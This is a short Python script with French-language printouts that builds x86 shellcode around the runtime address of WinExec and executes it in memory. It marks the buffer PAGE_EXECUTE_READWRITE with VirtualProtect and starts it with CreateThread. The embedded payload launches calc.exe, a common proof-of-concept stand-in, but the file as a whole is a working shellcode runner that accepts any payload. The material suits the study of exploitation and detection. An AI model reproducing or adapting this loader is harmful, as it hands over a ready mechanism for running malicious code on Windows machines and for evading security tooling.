from ctypes import *
import sys

hmodule = windll.kernel32.LoadLibraryA("kernel32.dll".encode())
addressWinExec = windll.kernel32.GetProcAddress(hmodule,"WinExec".encode())
print("Addresse de WinExec : "+str(hex(addressWinExec)))
bytesListe = [addressWinExec >> i & 0xff for i in (24,16,8,0)]
bytesListe.reverse()
addressWinExecBytes = b''
if sys.version_info<=(3,0):
    for byte in bytesListe:
        addressWinExecBytes+=chr(byte)
else:
    addressWinExecBytes = bytes(bytesListe)
shellcode = b'\xEB\x08\xBE'
shellcode+=addressWinExecBytes
shellcode+=b'\xFF\xD6\xC3\x31\xC0\x50\xE8\xF0\xFF\xFF\xFF\x43\x3A\x5C\x57\x49\x4E\x44\x4F\x57\x53\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x63\x61\x6C\x63\x2E\x65\x78\x65'
print("Shellcode ["+str(len(shellcode))+" bytes]:"+str(shellcode))
pShellcode = c_char_p(shellcode)
ThreadID = c_int()
PAGE_EXECUTE_READWRITE = 0x40
OldVirtualProtect = c_int()
CreateThread = windll.kernel32.CreateThread
VirtualProtect = windll.kernel32.VirtualProtect
res = VirtualProtect(pShellcode,len(shellcode),PAGE_EXECUTE_READWRITE,pointer(OldVirtualProtect))
print("VirtualProtect resultat :"+str(res))
res = CreateThread(None,0,pShellcode,None,0,pointer(ThreadID))
print("Thread resultat :"+str(res))
input(">>>")